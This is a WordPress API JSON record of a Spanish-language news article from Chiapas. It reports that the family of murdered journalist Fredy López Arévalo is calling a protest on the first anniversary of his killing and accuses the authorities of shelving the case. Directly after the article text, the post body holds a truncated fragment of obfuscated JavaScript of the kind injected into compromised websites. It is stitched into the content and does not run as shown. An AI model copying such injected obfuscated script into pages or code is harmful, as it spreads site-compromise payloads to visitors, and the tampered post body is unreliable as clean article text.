{"id":6230,"date":"2022-10-28T04:02:21","date_gmt":"2022-10-28T04:02:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6230"},"modified":"2022-10-28T04:02:21","modified_gmt":"2022-10-28T04:02:21","slug":"un-ano-sin-esclarecer-asesinato-de-fredy-lopez-arevalo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6230","title":{"rendered":"Un a\u00f1o sin esclarecer asesinato de Fredy L\u00f3pez Ar\u00e9valo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356-1024x768.jpg\" alt=\"\" class=\"wp-image-6231\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221027-WA0356.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- A un a\u00f1o del artero asesinato del periodista Fredy L\u00f3pez Ar\u00e9valo, familiares y amigos han convocado a una manifestaci\u00f3n a la altura del Kil\u00f3metro 46 de la carretera de cuota que va de esta ciudad a Tuxtla Guti\u00e9rrez, para pedir justicia por este crimen, ya que las autoridades han intentado dar \u201ccarpetazo\u201d al caso.Al respecto, \u00d3scar Takeshi L\u00f3pez Moreno dijo que ante el completo silencio de las autoridades, ya que en lugar de buscar a los autores intelectuales del asesinato de su padre, buscan ocultar pruebas e informaci\u00f3n, e incluso se atrevieron a decir que el autor material e intelectual aparecieron muertos, lo cual consideran falso.\u201cHay una falta de atenci\u00f3n y por eso estamos convocando a la ciudadan\u00eda en general a manifestarnos en contra de la inseguridad, en contra de una pol\u00edtica que no est\u00e1 sirviendo, en contra de todo lo que nos est\u00e1 lacerando, y conmemoramos el primer aniversario luctuoso de mi padre que fue asesinado afuera de su casa\u201d.Dijo que hasta el momento saben que el asesino estuvo vigilando a su padre por m\u00e1s de 20 d\u00edas y hasta la fecha las investigaciones est\u00e1n encarpetadas, por lo que considera la actuaci\u00f3n de las autoridades es deficiente en todo sentido, \u201ces una lucha contra el sistema a la vez, lo cual nos revictimiza, porque estamos atr\u00e1s de todos para que hagan su trabajo\u201d.Por \u00faltimo, coment\u00f3 que en el momento de la manifestaci\u00f3n van a decidir si hacen un bloqueo, pero por lo pronto se encuentran convocando a la ciudadan\u00eda y principalmente a los medios de comunicaci\u00f3n para solidarizarse con esta lucha, \u201cpor la tarde se har\u00e1 la presentaci\u00f3n de la revista Jovel\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- A un a\u00f1o del artero asesinato del periodista Fredy L\u00f3pez Ar\u00e9valo, familiares y amigos han convocado a una manifestaci\u00f3n a la altura del Kil\u00f3metro 46 de la carretera de cuota que va de esta ciudad a Tuxtla Guti\u00e9rrez, para pedir justicia por este crimen, ya que las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6231,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6230","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6230","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6230"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6230\/revisions"}],"predecessor-version":[{"id":6232,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6230\/revisions\/6232"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6231"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6230"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6230"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}